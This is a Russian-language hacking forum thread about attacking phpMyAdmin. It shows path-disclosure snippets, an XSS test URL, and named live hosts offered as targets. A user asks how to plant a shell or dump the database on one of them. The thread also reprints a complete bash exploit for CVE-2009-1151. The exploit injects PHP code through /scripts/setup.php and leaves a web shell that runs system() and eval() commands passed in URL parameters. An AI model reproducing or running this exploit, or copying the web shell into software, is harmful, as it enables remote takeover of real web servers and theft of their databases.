Fatal error: Call to undefined function PMA_reloadNavigation() in Z:\home\l
calhost\www\Tools\phpmyadmin\header.inc.php on line 132
Уязвимая часть :
PHP код:
 function PMA_reloadNavigation() { 
        global $cfg; 

        // Reloads the navigation frame via JavaScript if required 
        if (isset($GLOBALS['reload']) && $GLOBALS['reload']) { 
            echo "\n"; 
            $reload_url = './left.php?' . PMA_generate_common_url((isset($GLOBALS['db']) ? $GLOBALS['db'] : ''), '', '&'); 
            ?> 
<script type="text/javascript" language="javascript1.2"> 
<!-- 
if (typeof(window.parent) != 'undefined' 
    && typeof(window.parent.frames['nav']) != 'undefined') { 
    window.parent.frames['nav'].goTo('<?php echo $reload_url?>&hash=' + <?php echo (($cfg['QueryFrame'] && $cfg['QueryFrameJS']) ? 'window.parent.frames[\'queryframe\'].document.hashform.hash.value' "'" md5($cfg['PmaAbsoluteUri']) . "'"); ?>); 

//--> 
</script> 
            <?php 
            unset($GLOBALS['reload']); 
        } 
    }
UPD
Код:
http://localhost/Tools/phpMyAdmin/footer.inc.php
Код:
Notice: Undefined variable: cfg in Z:\home\localhost\www\Tools\phpmyadmin\footer.inc.php on line 17
Уязвимый код:
PHP код:
<?php
/* $Id$ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
 * WARNING: This script has to be included at the very end of your code because
 *          it will stop the script execution!
 */

require_once('./libraries/relation.lib.php'); // for PMA_setHistory()

/**
 * Query window
 */

// If query window is wanted and open, update with latest selected db/table.
if ($cfg['QueryFrame'] && $cfg['QueryFrameJS']) {
?>
Код:
http://localhost/Tools/phpMyAdmin/mult_submits.inc.php
Код:
Fatal error: Call to undefined function PMA_DBI_select_db() in Z:\home\localhost\www\Tools\phpmyadmin\mult_submits.inc.php on line 385
Уязвимый код:
PHP код:
if ($run_parts) { 
            $sql_query .= $a_query ';' "\n";
            if ($query_type != 'drop_db') {
                PMA_DBI_select_db($db);
            }
            $result = @PMA_DBI_query($a_query) or PMA_mysqlDie(''$a_queryFALSE$err_url);
        } // end if
    // end for

    if ($use_sql) {
        require('./sql.php');
    } elseif (!$run_parts) {
        PMA_DBI_select_db($db);
        $result PMA_DBI_query($sql_query);
    }

}

?> 


(C)Xcontrol212

Xcontrol212 17.12.2009 02:15
Цитата:
Сообщение от speles
как узнать точную версию phpMyAdmin
По changelog.php
Пример:
http://87.106.94.86/phpmyadmin/changelog.php

KIR@PRO 18.12.2009 14:22
Цитата:
Сообщение от oRb
Код:
/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E
раскрытие путей в 3.* версиях

Цитата:
Fatal error: Call to undefined function pma_issuperuser() in /www/html/pma/libraries/check_user_privileges.lib.php on line 16
Проверялось на версии 3.2.0.1
XSS то они походу заделали, но как всегда получили что то другое, в нашем случае раскрытие путей ;)

necros555 17.03.2010 01:48
http://tools.hostcommander.net/phpmyadmin/scripts/setup.php
имея такой доступ что можно зделать ? залить шел или слить базу какнибуть можно?

Pashkela 17.03.2010 02:57
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/

Sidarovich1975 11.04.2010 11:36
Цитата:
Сообщение от omel
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
Код:
#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
        echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
        echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
        exit
fi

if ! which curl >/dev/null
then
        echo "sorry but you need curl for this script to work!"
              echo "on Debian/Ubuntu: sudo apt-get install curl"
              exit
fi


function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

        flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
       
        echo "[+] attempting to inject phpinfo() ..."
        curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null

        if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
        then
                curl -ks --url "$3/config/config.inc.php" >$flag       
                echo "[+] success! phpinfo() injected successfully! output saved on $flag"
                curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
                echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
                echo "    $3/config/config.inc.php?c=ls+-l+/"
                echo "    $3/config/config.inc.php?p=phpinfo();"
                echo "    please send any feedback/improvements for this script to"\
                "unknown.pentester<AT_sign__here>gmail.com"
        else
                echo "[+] no luck injecting to $3/config/config.inc.php :("
                exit
        fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
        length=`echo -n $token | wc -c`

        # valid form token obtained?
        if [[ $length -eq 32 ]]
        then
                echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
                # attempt exploit!
                exploit $token $cookiejar $1
        else
                echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
                exit
        fi
else
        echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
        exit
fi

# milw0rm.com [2009-06-09]

Блин, извиняюсь за глупый вопрос:
но чем запустить ?
под виндой?

Red_EYEs 11.04.2010 15:55
to:Sidarovich1975
Cygwin =)

LavKraft 10.05.2010 09:55
#!/bin/bash под виндой :confused: Наврядли :D


Время: 13:15